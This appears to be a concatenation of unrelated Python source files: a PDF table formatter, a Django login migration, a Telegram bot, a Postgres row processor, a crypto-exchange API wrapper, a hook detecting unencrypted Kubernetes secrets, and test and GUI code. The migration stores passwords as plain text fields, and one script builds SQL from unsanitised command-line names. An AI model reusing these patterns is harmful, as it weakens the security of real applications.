"""Set alternative column colors"""
return self.apply_style("COLBACKGROUNDS", colors)
def set_row_backgrounds(self, colors):
"""Set alternative row colors"""
return self.apply_style("ROWBACKGROUNDS", colors)
class _RegionIX(object):
""" Custom version of indexer which ensures a DataFrame is created for proper use with the RangeFormatter"""
def __init__(self, region, idx_fct_name="iloc"):
self.region = region
self.idx_fct_name = idx_fct_name
def __getitem__(self, key):
"""Sloppy implementation as I do not handle nested tuples properly"""
if isinstance(key, tuple):
if len(key) != 2:
raise Exception("if tuple is used, it must contain 2 indexers")
ridx = key[0]
cidx = key[1]
else:
ridx = key
cidx = slice(None)
region = self.region
# bug when ridx is -1 and only a single row - cannot get DataFrame
if np.isscalar(ridx) and ridx == -1 and len(region.formatted_values.index) == 1:
ridx = [0]
else:
ridx = [ridx] if np.isscalar(ridx) else ridx
cidx = [cidx] if np.isscalar(cidx) else cidx
idx = getattr(region.formatted_values, self.idx_fct_name)
result = idx[ridx, cidx]
if not isinstance(result, pd.DataFrame):
raise Exception(
"index %s is expected to return a DataFrame, not %s"
% (key, type(result))
)
return RegionFormatter(self.region.parent, result.index, result.columns)
class TableFormatter(object):
def __init__(self, df, inc_header=1, inc_index=1):
self.df = df
self.inc_header = inc_header
self.inc_index = inc_index
self.ncols = ncols = len(df.columns)
self.nrows = nrows = len(df.index)
self.nhdrs = nhdrs = inc_header and df.columns.nlevels or 0
self.nidxs = nidxs = inc_index and df.index.nlevels or 0
self.style_cmds = []
# copy the actual values to the formatted cells
values = (
df.reset_index(drop=not inc_index)
.T.reset_index(drop=not inc_header)
.T.reset_index(drop=True)
)
if inc_index and nhdrs > 1: # move index name down
values.iloc[nhdrs - 1, :nidxs] = values.iloc[0, :nidxs]
values.iloc[: nhdrs - 1, :nidxs] = ""
formatted_values = pd.DataFrame(
np.empty((nhdrs + nrows, nidxs + ncols), dtype=object)
)
        formatted_values.iloc[:, :] = values.copy().values
self.actual_values = values
self.formatted_values = formatted_values
self.named_regions = {
"ALL": RegionFormatter(
self, formatted_values.index, formatted_values.columns
),
"HEADER": RegionFormatter(
self, formatted_values.index[:nhdrs], formatted_values.columns[nidxs:]
),
"INDEX": RegionFormatter(
self, formatted_values.index[nhdrs:], formatted_values.columns[:nidxs]
),
"CELLS": RegionFormatter(
self, formatted_values.index[nhdrs:], formatted_values.columns[nidxs:]
),
"INDEX_HEADER": RegionFormatter(
self, formatted_values.index[:nhdrs], formatted_values.columns[:nidxs]
),
}
# Define some fields to handle weight of rows/columns
self.rowattrs = pd.DataFrame(
np.empty((nhdrs + nrows, 4)), columns=["weight", "min", "max", "value"]
)
self.rowattrs[:] = np.nan
self.colattrs = pd.DataFrame(
np.empty((nidxs + ncols, 4)), columns=["weight", "min", "max", "value"]
)
self.colattrs[:] = np.nan
def __getitem__(self, name):
return self.named_regions[name]
def get_default_header_style(self, **overrides):
return dict(DefaultHeaderStyle, **overrides)
def apply_default_cell_style(self, **overrides):
styles = dict(DefaultCellStyle, **overrides)
self.cells.apply_styles(styles)
return self
def apply_default_header_style(self, inc_index=0, **overrides):
styles = self.get_default_header_style(**overrides)
self.header.apply_styles(styles)
if inc_index:
self.index_header.apply_styles(styles)
return self
def apply_default_index_style(self, **overrides):
styles = dict(DefaultIndexStyle, **overrides)
self.index.apply_styles(styles)
return self
def apply_default_style(
self,
inc_cells=1,
inc_header=1,
inc_index=1,
inc_index_header=0,
cells_override=None,
header_override=None,
index_override=None,
):
inc_cells and self.apply_default_cell_style(**(cells_override or {}))
inc_header and self.apply_default_header_style(
inc_index=inc_index_header, **(header_override or {})
)
inc_index and self.apply_default_index_style(**(index_override or {}))
return self
def apply_basic_style(
self,
font="Helvetica",
font_bold="Helvetica-Bold",
font_size=8,
rpad=None,
lpad=None,
bpad=None,
tpad=None,
colspans=1,
rowspans=0,
cmap=None,
font_bw=1,
stripe_rows=1,
stripe_cols=0,
hdr_border_clazz=BorderTypeGrid,
cell_border_clazz=BorderTypeOutline,
border_weight=0.7,
):
Style.apply_basic(
self,
font=font,
font_bold=font_bold,
font_size=font_size,
rpad=rpad,
lpad=lpad,
bpad=bpad,
tpad=tpad,
colspans=colspans,
rowspans=rowspans,
)
Style.apply_color(
self,
cmap,
font_bw=font_bw,
stripe_cols=stripe_cols,
stripe_rows=stripe_rows,
hdr_border_clazz=hdr_border_clazz,
cell_border_clazz=cell_border_clazz,
border_weight=border_weight,
)
return self
@property
def all(self):
return self["ALL"]
@property
def header(self):
return self["HEADER"]
@property
def index(self):
return self["INDEX"]
@property
def index_header(self):
return self["INDEX_HEADER"]
@property
def cells(self):
return self["CELLS"]
def set_row_heights(self, pcts=None, amts=None, maxs=None, mins=None):
"""
        :param pcts: the percent of available height to use (a ratio is also acceptable)
:param amts: (Array or scalar) the fixed height of the rows
:param maxs: (Array or scalar) the maximum height of the rows (only use when pcts is used)
:param mins: (Array or scalar) the minimum height of the rows (only used when pcts is used)
:return:
"""
for arr, attr in zip(
[pcts, amts, maxs, mins], ["weight", "value", "max", "min"]
):
if arr is not None:
if not np.isscalar(arr):
if len(arr) != len(self.formatted_values.index):
raise ValueError(
"%s: expected %s rows but got %s"
% (attr, len(arr), len(self.formatted_values.index))
)
                self.rowattrs.loc[:, attr] = arr
return self
def set_col_widths(self, pcts=None, amts=None, maxs=None, mins=None):
"""
        :param pcts: the percent of available width to use (a ratio is also acceptable)
:param amts: (Array or scalar) the fixed width of the cols
:param maxs: (Array or scalar) the maximum width of the cols (only use when pcts is used)
:param mins: (Array or scalar) the minimum width of the cols (only used when pcts is used)
:return:
"""
for arr, attr in zip(
[pcts, amts, maxs, mins], ["weight", "value", "max", "min"]
):
if arr is not None:
if not np.isscalar(arr):
if len(arr) != len(self.formatted_values.columns):
raise ValueError(
"%s: expected %s cols but got %s"
% (attr, len(arr), len(self.formatted_values.columns))
)
                self.colattrs.loc[:, attr] = arr
return self
def _resolve_dims(self, available, attrs):
def _clean(v):
return None if np.isnan(v) else v
if attrs["value"].notnull().any(): # Static values
# Assume that if one is set than all are set
return [_clean(a) for a in attrs["value"]]
elif attrs["weight"].notnull().any():
# Dynamic values
f = attrs
f["active"] = (attrs["weight"] * available) / attrs["weight"].sum()
f["active"] = f[["active", "min"]].max(axis=1)
f["active"] = f[["active", "max"]].min(axis=1)
return list(f.active.fillna(0))
elif attrs["min"].notnull().any():
return [_clean(a) for a in attrs["min"]]
else:
return None
def resolve_col_widths(self, availWidth):
return self._resolve_dims(availWidth, self.colattrs)
def resolve_row_heights(self, availHeight):
return self._resolve_dims(availHeight, self.rowattrs)
def build(self, expand="wh", shrink="wh", vAlign="MIDDLE", hAlign="CENTER"):
return TableLayout(self, expand, shrink, hAlign, vAlign)
def _find_column_label_positions(self, match_value_or_fct, levels=None):
"""Check the original DataFrame's column labels to find the locations of columns. And return the adjusted
column indexing within region (offset if including index)"""
allmatches = find_locations(self.df.columns, match_value_or_fct, levels)
        if allmatches and self.inc_index:  # translate back
allmatches = [m + self.nidxs for m in allmatches]
return allmatches
def _find_row_label_positions(self, match_value_or_fct, levels=None):
"""Check the original DataFrame's row labels to find the locations of rows. And return the adjusted
row indexing within region (offset if including index)"""
allmatches = find_locations(self.df.index, match_value_or_fct, levels)
        if allmatches and self.inc_index:  # translate back
allmatches = [m + self.nhdrs for m in allmatches]
return allmatches
class TableLayout(Flowable):
def __init__(self, tb, expand="wh", shrink="wh", hAlign="CENTER", vAlign="MIDDLE"):
self.tb = tb
self.expand = expand or ""
self.shrink = shrink or ""
self.vAlign = vAlign
self.hAlign = hAlign
self._style_and_data = None
self.component = None
@property
def style_and_data(self):
if self._style_and_data is None:
data = self.tb.formatted_values.values.tolist()
style = TableStyle(self.tb.style_cmds)
self._style_and_data = style, data
return self._style_and_data
def wrap(self, aw, ah):
style, data = self.style_and_data
# Apply any column / row sizes requested
widths = self.tb.resolve_col_widths(aw)
heights = self.tb.resolve_row_heights(ah)
tbl = Table(
data,
colWidths=widths,
rowHeights=heights,
style=style,
vAlign=self.vAlign,
hAlign=self.hAlign,
repeatCols=False,
repeatRows=True,
)
w, h = tbl.wrap(aw, ah)
pw, ph = w / float(aw), h / float(ah)
shrink, expand = self.shrink, self.expand
scale = 0
if expand and pw < 1.0 and ph < 1.0:
scale = max("w" in expand and pw or 0, "h" in expand and ph or 0)
elif shrink and (pw > 1.0 or ph > 1.0):
scale = max("w" in shrink and pw or 0, "h" in expand and ph or 0)
if scale:
self.component = comp = KeepInFrame(
aw, ah, content=[tbl], hAlign=self.hAlign, vAlign=self.vAlign
)
w, h = comp.wrapOn(self.canv, aw, ah)
comp._scale = scale
else:
self.component = tbl
return w, h
def drawOn(self, canvas, x, y, _sW=0):
return self.component.drawOn(canvas, x, y, _sW=_sW)
def split(self, aw, ah):
if self.component:
return self.component.split(aw, ah)
else:
return []
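# End-to-end sketch (illustrative; the final PDF build step with reportlab's
# SimpleDocTemplate is shown commented out and is an assumption about how the
# resulting flowable would be consumed):
#
#   df = pd.DataFrame({'a': [1, 2], 'b': [3.5, -4.25]})
#   tf = TableFormatter(df)
#   tf.apply_basic_style(cmap=Style.Blue)
#   tf.cells.float_format(precision=2)      # red/black negatives, right aligned
#   flowable = tf.build(expand='wh')        # returns a TableLayout Flowable
#   # SimpleDocTemplate('out.pdf').build([flowable])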
|
py | b4112995ed34faa28e1c4aba0c13d1666c0a2234 | # Generated by Django 4.0.1 on 2022-02-07 12:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0003_initial'),
]
operations = [
migrations.CreateModel(
name='LoginModel',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=50, verbose_name='Username')),
('password', models.CharField(max_length=50, verbose_name='Password')),
],
),
]
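# Note (illustrative, not generated by Django): this migration is applied with
# the standard management command, e.g.
#
#   python manage.py migrate user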
|
py | b411299bd2861845cbf7bad0ec494450a179cc9d | import multiprocessing
import time
import random
from modules import (
throw_dice, check_holiday, days_until_summer, days_until_newyear,
show_color_rgb, get_coordinates, usual_lootbox, weapon_lootbox
)
from telegram_bot import Bot
from jsondb import JsonDB
def message_handler(incoming_message):
global shadow_db
# default / and ? commands from commands.json
commands = JsonDB("commands.json")["commands"]
# quotes for bot's random quote feature
quotes = JsonDB("data/quotes.json")["quotes"]
result = {
"method": "send_message",
"chat_id": incoming_message["chat_id"],
"text": "?"
}
for command_name in commands.keys():
if incoming_message["text"] == command_name:
result["text"] = commands[command_name]
# random quote feature
if incoming_message["text"] == "/quote":
result["text"] = random.choice(quotes)
# lootboxes feature
if incoming_message["text"] == "/lootbox":
result["text"] = usual_lootbox()
if incoming_message["text"] == "/weapon_lootbox":
result["text"] = weapon_lootbox()
# throwing dice feature
if incoming_message["text"].startswith("/dice"):
result["text"] = throw_dice(incoming_message["text"])
# random choice feature
if incoming_message["text"].startswith("/random"):
try:
random_result = random.choice(incoming_message["text"].split(" ")[1:])
except:
random_result = "Type command correctly"
finally:
result["text"] = random_result
# days until newyear or summer feature
if incoming_message["text"] == "/newyear":
result["text"] = days_until_newyear()
if incoming_message["text"] == "/summer":
result["text"] = days_until_summer()
# locations feature
if incoming_message["text"].startswith("/where"):
try:
location = incoming_message["text"].split(" ")[1]
result = {
"method": "send_location",
"coordinates": get_coordinates(location),
"chat_id": incoming_message["chat_id"]
}
except:
result = {
"method": "send_message",
"chat_id": incoming_message["chat_id"],
"text": "Type command correctly"
}
if incoming_message["text"].startswith("/location") and incoming_message["text"] != "/locations":
try:
location = incoming_message["text"].split(" ")[1:]
result = {
"method": "send_location",
"coordinates": {"latitude": float(location[0]), "longitude": float(location[1])},
"chat_id": incoming_message["chat_id"]
}
except:
result = {
"method": "send_message",
"chat_id": incoming_message["chat_id"],
"text": "Type command correctly"
}
# chat id getter
if incoming_message["text"] == "/chat_id":
result["text"] = incoming_message["chat_id"]
# unix time feature
if incoming_message["text"] == "/unix_time":
result["text"] = "{} seconds since 00:00:00 1 January 1970".format(str(round(time.time())))
# holiday feature
if incoming_message["text"] == "/holiday":
result["text"] = check_holiday()
# rgb feature
if incoming_message["text"].startswith("/rgb"):
try:
rgb = [int(color) for color in incoming_message["text"].split(" ")[1:]]
rgb = tuple(rgb)
if len(rgb) != 3:
raise ValueError
except:
rgb = (255, 255, 255)
finally:
result = {
"method": "send_photo",
"photo": open(show_color_rgb(rgb), "rb"),
"caption": "Red - {}, Green - {}, Blue - {}".format(rgb[0], rgb[1], rgb[2]),
"chat_id": incoming_message["chat_id"]
}
# drop log file feature
if incoming_message["text"] == "/droplog":
result = {
"method": "send_document",
"caption": "Log",
"chat_id": incoming_message["chat_id"]
}
if "text" in result.keys():
if result["text"] == "?":
result = None
return result
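# Illustrative calls (chat_id 42 is an arbitrary example value):
#
#   message_handler({"text": "/unix_time", "chat_id": 42})
#   # -> {"method": "send_message", "chat_id": 42,
#   #     "text": "<seconds> seconds since 00:00:00 1 January 1970"}
#   message_handler({"text": "hello", "chat_id": 42})
#   # -> None: unrecognised text leaves the "?" placeholder and is dropped by the caller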
def bot_processor(delay):
global lock, db
bot = Bot(db["token"], admin_id=db["admin_id"])
while True:
lock.acquire()
messages = bot.get_last_messages()
for message in messages:
if round(time.time()) - message["date"] <= db["max_time_diff"]:
try:
incoming_message = {"text": message["text"], "chat_id": message["chat"]["id"]}
                    # some messages have no text (stickers, files, etc.)
except:
continue
outgoing_message = message_handler(incoming_message)
if outgoing_message is None:
continue
elif outgoing_message["method"] == "send_message":
bot.send_message(outgoing_message["chat_id"], outgoing_message["text"])
elif outgoing_message["method"] == "send_location":
bot.send_location(outgoing_message["chat_id"], outgoing_message["coordinates"])
elif outgoing_message["method"] == "send_photo":
bot.send_file(outgoing_message["chat_id"],
outgoing_message["photo"],
"photo",
outgoing_message["caption"])
elif outgoing_message["method"] == "send_audio":
bot.send_file(outgoing_message["chat_id"], outgoing_message["audio"], "audio")
elif outgoing_message["method"] == "send_document":
if outgoing_message["caption"].startswith("Log"):
if outgoing_message["chat_id"] == bot.admin_id:
bot.send_file(bot.admin_id,
open(bot.log_file, "rb"),
"document",
outgoing_message["caption"])
else:
bot.send_message(bot.admin_id, "Unresolved attempt to access to log file from {}".format(
outgoing_message["chat_id"]))
else:
pass
db["last_checked_update_id"] = bot.last_checked_update_id
db.write()
lock.release()
time.sleep(delay)
if __name__ == '__main__':
db = JsonDB("db.json")
lock = multiprocessing.Lock()
manager = multiprocessing.Manager()
shadow_db = manager.dict()
bot_process = multiprocessing.Process(target=bot_processor, args=(db["delays"]["bot"],))
bot_process.start()
bot_process.join()
|
py | b4112a059f046a6fce87fa439b64451b87755d40 | import sys
import subprocess
import json
import psycopg2.extras
from common import conn, command, aggregate, get_aggregate
def handler(obj):
if hasattr(obj, 'isoformat'):
return obj.isoformat()
else:
raise TypeError('Object of type %s with value of %s is not JSON serializable' % (type(obj), repr(obj)))
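# Illustration: `handler` lets json.dumps serialise the date/datetime values
# that psycopg2 returns inside result rows.
#
#   import datetime, json
#   json.dumps({"ts": datetime.datetime(2020, 1, 2, 3, 4, 5)}, default=handler)
#   # -> '{"ts": "2020-01-02T03:04:05"}'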
cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
def prepare(table, check_column):
cur.execute("SELECT column_name FROM information_schema.columns WHERE table_name=%s and column_name=%s", (table, check_column))
if not cur.fetchone():
cur.execute("alter table %s add column %s boolean" % (table, check_column))
conn.commit()
def run(table, check_column, update_column, id_column, app):
p = subprocess.Popen([ app ], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
while True:
cur.execute("select * from %s where %s is distinct from 't' for update skip locked limit 1" % (table, check_column))
r = cur.fetchone()
if not r:
break
print("Processing row %s..." % r[id_column], end="")
sys.stdout.flush()
p.stdin.write((json.dumps(r, default=handler)+"\n").encode())
p.stdin.flush()
res = p.stdout.readline()
try:
res = json.loads(res)
except:
print(" Fail.")
print(res)
raise
        if update_column not in res or id_column not in res:
            print(" Fail.")
            print(res)
            raise Exception("Missing %s or %s key, broken app!" % (update_column, id_column))
cur.execute("update %s set %s = 't', %s = %s where %s = %s" % (table, check_column, update_column, '%s', id_column, '%s'), (res[update_column], res[id_column]))
print(" Done.")
conn.commit()
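# Sketch of a compatible worker "app" (illustrative; the column names "id" and
# "result" are hypothetical and must match the id_column/update_column passed on
# the command line). It reads one JSON-encoded row per line on stdin and answers
# with one JSON line per row:
#
#   #!/usr/bin/env python3
#   import sys, json
#   for line in sys.stdin:
#       row = json.loads(line)
#       out = {"id": row["id"], "result": len(str(row))}
#       sys.stdout.write(json.dumps(out) + "\n")
#       sys.stdout.flush()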
if __name__ == "__main__":
if len(sys.argv) < 6:
print("Provide table, check_column, update_column, id_column and app!")
sys.exit(2)
print("Prepare start")
prepare(sys.argv[1], sys.argv[2])
print("RUN")
run(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
|
py | b4112a33b7c72f91064054135362a5f77e46ebb6 | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import OrderNotFound
class bitflyer (Exchange):
def describe(self):
return self.deep_extend(super(bitflyer, self).describe(), {
'id': 'bitflyer',
'name': 'bitFlyer',
'countries': 'JP',
'version': 'v1',
'rateLimit': 1000, # their nonce-timestamp is in seconds...
'has': {
'CORS': False,
'withdraw': True,
'fetchMyTrades': True,
'fetchOrders': True,
'fetchOrder': True,
'fetchOpenOrders': 'emulated',
'fetchClosedOrders': 'emulated',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28051642-56154182-660e-11e7-9b0d-6042d1e6edd8.jpg',
'api': 'https://api.bitflyer.jp',
'www': 'https://bitflyer.jp',
'doc': 'https://bitflyer.jp/API',
},
'api': {
'public': {
'get': [
'getmarkets/usa', # new(wip)
'getmarkets/eu', # new(wip)
'getmarkets', # or 'markets'
'getboard', # ...
'getticker',
'getexecutions',
'gethealth',
'getboardstate',
'getchats',
],
},
'private': {
'get': [
'getpermissions',
'getbalance',
'getcollateral',
'getcollateralaccounts',
'getaddresses',
'getcoinins',
'getcoinouts',
'getbankaccounts',
'getdeposits',
'getwithdrawals',
'getchildorders',
'getparentorders',
'getparentorder',
'getexecutions',
'getpositions',
'gettradingcommission',
],
'post': [
'sendcoin',
'withdraw',
'sendchildorder',
'cancelchildorder',
'sendparentorder',
'cancelparentorder',
'cancelallchildorders',
],
},
},
'fees': {
'trading': {
'maker': 0.25 / 100,
'taker': 0.25 / 100,
},
},
})
async def fetch_markets(self):
jp_markets = await self.publicGetGetmarkets()
us_markets = await self.publicGetGetmarketsUsa()
eu_markets = await self.publicGetGetmarketsEu()
markets = self.array_concat(jp_markets, us_markets)
markets = self.array_concat(markets, eu_markets)
result = []
for p in range(0, len(markets)):
market = markets[p]
id = market['product_code']
currencies = id.split('_')
base = None
quote = None
symbol = id
numCurrencies = len(currencies)
if numCurrencies == 1:
base = symbol[0:3]
quote = symbol[3:6]
elif numCurrencies == 2:
base = currencies[0]
quote = currencies[1]
symbol = base + '/' + quote
else:
base = currencies[1]
quote = currencies[2]
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.privateGetGetbalance()
balances = {}
for b in range(0, len(response)):
account = response[b]
currency = account['currency_code']
balances[currency] = account
result = {'info': response}
currencies = list(self.currencies.keys())
for i in range(0, len(currencies)):
currency = currencies[i]
account = self.account()
if currency in balances:
account['total'] = balances[currency]['amount']
account['free'] = balances[currency]['available']
account['used'] = account['total'] - account['free']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
orderbook = await self.publicGetGetboard(self.extend({
'product_code': self.market_id(symbol),
}, params))
return self.parse_order_book(orderbook, None, 'bids', 'asks', 'price', 'size')
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
ticker = await self.publicGetGetticker(self.extend({
'product_code': self.market_id(symbol),
}, params))
timestamp = self.parse8601(ticker['timestamp'])
last = float(ticker['ltp'])
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['best_bid']),
'bidVolume': None,
'ask': float(ticker['best_ask']),
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': float(ticker['volume_by_product']),
'quoteVolume': None,
'info': ticker,
}
def parse_trade(self, trade, market=None):
side = None
order = None
if 'side' in trade:
if trade['side']:
side = trade['side'].lower()
id = side + '_child_order_acceptance_id'
if id in trade:
order = trade[id]
if order is None:
order = self.safe_string(trade, 'child_order_acceptance_id')
timestamp = self.parse8601(trade['exec_date'])
return {
'id': str(trade['id']),
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'order': order,
'type': None,
'side': side,
'price': trade['price'],
'amount': trade['size'],
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
response = await self.publicGetGetexecutions(self.extend({
'product_code': market['id'],
}, params))
return self.parse_trades(response, market, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
order = {
'product_code': self.market_id(symbol),
'child_order_type': type.upper(),
'side': side.upper(),
'price': price,
'size': amount,
}
result = await self.privatePostSendchildorder(self.extend(order, params))
# {"status": - 200, "error_message": "Insufficient funds", "data": null}
return {
'info': result,
'id': result['child_order_acceptance_id'],
}
async def cancel_order(self, id, symbol=None, params={}):
if symbol is None:
raise ExchangeError(self.id + ' cancelOrder() requires a symbol argument')
await self.load_markets()
return await self.privatePostCancelchildorder(self.extend({
'product_code': self.market_id(symbol),
'child_order_acceptance_id': id,
}, params))
def parse_order_status(self, status):
statuses = {
'ACTIVE': 'open',
'COMPLETED': 'closed',
'CANCELED': 'canceled',
'EXPIRED': 'canceled',
'REJECTED': 'canceled',
}
if status in statuses:
return statuses[status]
return status.lower()
def parse_order(self, order, market=None):
timestamp = self.parse8601(order['child_order_date'])
amount = self.safe_float(order, 'size')
remaining = self.safe_float(order, 'outstanding_size')
filled = self.safe_float(order, 'executed_size')
price = self.safe_float(order, 'price')
cost = price * filled
status = self.parse_order_status(order['child_order_state'])
type = order['child_order_type'].lower()
side = order['side'].lower()
symbol = None
if market is None:
marketId = self.safe_string(order, 'product_code')
if marketId is not None:
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
if market is not None:
symbol = market['symbol']
fee = None
feeCost = self.safe_float(order, 'total_commission')
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': None,
'rate': None,
}
return {
'id': order['child_order_acceptance_id'],
'info': order,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': type,
'side': side,
'price': price,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'fee': fee,
}
async def fetch_orders(self, symbol=None, since=None, limit=100, params={}):
if symbol is None:
raise ExchangeError(self.id + ' fetchOrders() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
request = {
'product_code': market['id'],
'count': limit,
}
response = await self.privateGetGetchildorders(self.extend(request, params))
orders = self.parse_orders(response, market, since, limit)
if symbol:
orders = self.filter_by(orders, 'symbol', symbol)
return orders
async def fetch_open_orders(self, symbol=None, since=None, limit=100, params={}):
params['child_order_state'] = 'ACTIVE'
return self.fetch_orders(symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=100, params={}):
params['child_order_state'] = 'COMPLETED'
return self.fetch_orders(symbol, since, limit, params)
async def fetch_order(self, id, symbol=None, params={}):
if symbol is None:
raise ExchangeError(self.id + ' fetchOrder() requires a symbol argument')
orders = await self.fetch_orders(symbol)
ordersById = self.index_by(orders, 'id')
if id in ordersById:
return ordersById[id]
raise OrderNotFound(self.id + ' No order found with id ' + id)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ExchangeError(self.id + ' fetchMyTrades requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
request = {
'product_code': market['id'],
}
if limit:
request['count'] = limit
response = await self.privateGetGetexecutions(self.extend(request, params))
return self.parse_trades(response, market, since, limit)
async def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
await self.load_markets()
if code != 'JPY' and code != 'USD' and code != 'EUR':
raise ExchangeError(self.id + ' allows withdrawing JPY, USD, EUR only, ' + code + ' is not supported')
currency = self.currency(code)
response = await self.privatePostWithdraw(self.extend({
'currency_code': currency['id'],
'amount': amount,
# 'bank_account_id': 1234,
}, params))
return {
'info': response,
'id': response['message_id'],
}
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
request = '/' + self.version + '/'
if api == 'private':
request += 'me/'
request += path
if method == 'GET':
if params:
request += '?' + self.urlencode(params)
url = self.urls['api'] + request
if api == 'private':
self.check_required_credentials()
nonce = str(self.nonce())
auth = ''.join([nonce, method, request])
if params:
if method != 'GET':
body = self.json(params)
auth += body
headers = {
'ACCESS-KEY': self.apiKey,
'ACCESS-TIMESTAMP': nonce,
'ACCESS-SIGN': self.hmac(self.encode(auth), self.encode(self.secret)),
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
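# --- Illustrative usage sketch (not part of the generated class) ----------------
# A hypothetical async call site for the exchange wrapper above; it assumes the
# old-style 'ccxt.async' package layout used by this file and live network access.
#
#     import asyncio
#     import ccxt.async as ccxt_async
#
#     async def show_ticker():
#         exchange = ccxt_async.bitflyer()
#         print(await exchange.fetch_ticker('BTC/JPY'))
#
#     asyncio.get_event_loop().run_until_complete(show_ticker())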
|
py | b4112aa75b3244722fb77d7a89ee0263ccfb2ac2 | from __future__ import print_function
import argparse
import re
import sys
SECRET_REGEX = r"^kind:\ssecret"
SOPS_REGEX = r"ENC.AES256"
KUSTOMIZE_REGEX = r"^\$patch:\sdelete"
def contains_secret(filename):
with open(filename, mode="r") as file_checked:
lines = file_checked.read()
kubernetes_secret = re.findall(
SECRET_REGEX, lines, flags=re.IGNORECASE | re.MULTILINE
)
if kubernetes_secret:
ignore_secret = re.findall(
SOPS_REGEX, lines, flags=re.IGNORECASE | re.MULTILINE
) or re.findall(KUSTOMIZE_REGEX, lines, flags=re.IGNORECASE | re.MULTILINE)
if not ignore_secret:
return True
return False
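# --- Illustrative sketch (not part of the original hook) ------------------------
# contains_secret() works on file paths, so a quick manual check can write a
# sample manifest to a temporary file first. The manifest below is made up.
def _demo_contains_secret():
    import tempfile
    sample = (
        "apiVersion: v1\n"
        "kind: Secret\n"
        "metadata:\n"
        "  name: demo\n"
        "data:\n"
        "  password: cGFzc3dvcmQ=\n"
    )
    with tempfile.NamedTemporaryFile("w", suffix=".yaml", delete=False) as tmp:
        tmp.write(sample)
        path = tmp.name
    # True: an unencrypted Secret (no SOPS markers, no kustomize $patch: delete).
    print(contains_secret(path))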
def main(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument("filenames", nargs="*", help="filenames to check")
args = parser.parse_args(argv)
files_with_secrets = [f for f in args.filenames if contains_secret(f)]
return_code = 0
for file_with_secrets in files_with_secrets:
print(
"Unencrypted Kubernetes secret detected in file: {0}".format(
file_with_secrets
)
)
return_code = 1
return return_code
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
py | b4112ad0907859d906954865d64d0e825f570873 | #
# Test base current collector submodel
#
import pybamm
import tests
import unittest
class TestBaseModel(unittest.TestCase):
def test_public_functions(self):
param = pybamm.standard_parameters_lithium_ion
submodel = pybamm.current_collector.PotentialPair1plus1D(param)
variables = {
"Positive current collector potential": pybamm.PrimaryBroadcast(
0, "current collector"
)
}
std_tests = tests.StandardSubModelTests(submodel, variables)
std_tests.test_all()
submodel = pybamm.current_collector.PotentialPair2plus1D(param)
std_tests = tests.StandardSubModelTests(submodel, variables)
std_tests.test_all()
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
py | b4112adf18535e3c4fe9661587c65c8389cee4ed | """
Input Dialog for EELS Analysis
Author: Gerd Duscher
"""
import numpy as np
import sidpy
from PyQt5 import QtCore, QtWidgets
from pyTEMlib import info_dlg
import pyTEMlib.interactive_eels as ieels
from pyTEMlib.microscope import microscope
from pyTEMlib import file_tools as ft
_version = 000
class InfoDialog(QtWidgets.QDialog):
"""
Input Dialog for EELS Analysis
    Opens a PyQt5 GUI dialog that allows setting the experimental parameters necessary for a quantification.
    The dialog operates on a sidpy dataset.
"""
def __init__(self, dataset=None):
super().__init__(None, QtCore.Qt.WindowStaysOnTopHint)
# Create an instance of the GUI
self.ui = info_dlg.UiDialog(self)
self.set_action()
self.dataset = dataset
self.spec_dim = []
self.energy_scale = np.array([])
self.experiment = {}
self.energy_dlg = None
self.axis = None
self.show()
if dataset is None:
# make a dummy dataset for testing
dataset = ft.make_dummy_dataset(sidpy.DataType.SPECTRUM)
if not isinstance(dataset, sidpy.Dataset):
raise TypeError('dataset has to be a sidpy dataset')
self.set_dataset(dataset)
self.dataset.plot()
if hasattr(self.dataset.view, 'axes'):
self.axis = self.dataset.view.axes[-1]
elif hasattr(self.dataset.view, 'axis'):
self.axis = self.dataset.view.axis
self.figure = self.axis.figure
self.plot()
self.update()
def set_dataset(self, dataset):
self.dataset = dataset
if not hasattr(self.dataset, '_axes'):
self.dataset._axes = self.dataset.axes
if not hasattr(self.dataset, 'meta_data'):
self.dataset.meta_data = {}
